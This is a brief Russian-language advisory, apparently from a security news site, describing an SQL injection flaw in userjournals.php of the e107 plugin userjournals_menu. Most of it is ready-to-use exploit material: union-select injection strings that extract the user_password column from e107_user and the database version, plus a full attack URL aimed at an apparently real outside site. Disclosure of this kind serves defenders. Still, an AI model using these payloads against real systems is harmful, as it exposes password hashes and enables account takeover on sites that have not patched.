Программа: e107 Plugin userjournals_menu

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием userjournals.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

http://localhost/plugins/userjournals_menu/userjournals.php?blog.[exploit]

-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from
e107_user—

-9999 union all select 1,2,null,4,5,6,@@version,8,9,0,11,12,13—

Демонстрация:

http://demo.infozonelab.com/plugins/userjournals_menu/userjournals.php?blog.-9999
union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user—



Оставить мнение